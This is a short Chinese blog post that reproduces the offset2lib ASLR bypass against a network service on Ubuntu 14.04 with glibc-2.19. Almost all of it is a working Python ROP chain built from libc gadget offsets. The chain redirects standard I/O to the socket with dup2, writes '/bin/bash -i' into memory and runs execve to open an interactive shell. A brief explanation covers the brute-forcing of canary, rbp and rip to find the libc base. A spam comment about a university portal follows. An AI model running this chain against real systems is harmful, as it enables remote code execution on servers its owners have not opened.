zerons's Blog

For The Dream

offset2lib glibc2-19 测试

zerons posted @ 2015年4月07日 14:47 in sec , 1307 阅读

ref http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html

 

环境 ubuntu14.04.2 glibc-2.19 kernel 3.18.9

 

.py文件需要修改成对应于glibc-2.19的版本

off = libc_base

# dup2 to the three standard I/O FD (STDIN, STDOUT, STDERR)
# dup2(4,0)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x0)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) #  execve #dup2 33
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,1)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x1)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) #  execve #dup2 33
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,2)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x2)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) #  execve #dup2 33
p += pack('Q', off) #padding
p += pack('Q', off) #padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret


p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "/bin/bas" # /bin/bas
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf088) # @ .data + 8
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "hAAAAAAA" # hAAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf089) # @ .data + 9
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ;ret 

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "-iAAAAAA" # -iAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08c) # @ .data + 12
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf095) # @ .data + 21
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data

p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13

p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29

p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x000000000000003b) #  execve
p += pack("Q", off) #padding
p += pack("Q", off) #padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

代码通过不断的比较服务程序返回的值来依次测试偏移量, canary, rbp, rip, 由rip可得到对应的程序加载基址, 从而可得到libc的加载基址, 通过相应指令在libc中的偏移来复制文件描述符 执行bash程序.

Avatar_small
wgu student portal l 说:
2022年8月26日 10:23

Student Portal - Western Governors University. Access the WGU student portal here. Students can find instructions for initial log in to the learning portal for the university. This will give you access to the WGU Student Portal, wgu student portal login which you will need to access in order to complete the financial aid process and/or make your first tuition 2021.Student Portal - Western Governors University. Access the WGU student portal here. Students can find instructions for initial log in to the learning portal for the university. This will give you access to the WGU Student Portal.


登录 *


loading captcha image...
(输入验证码)
or Ctrl+Enter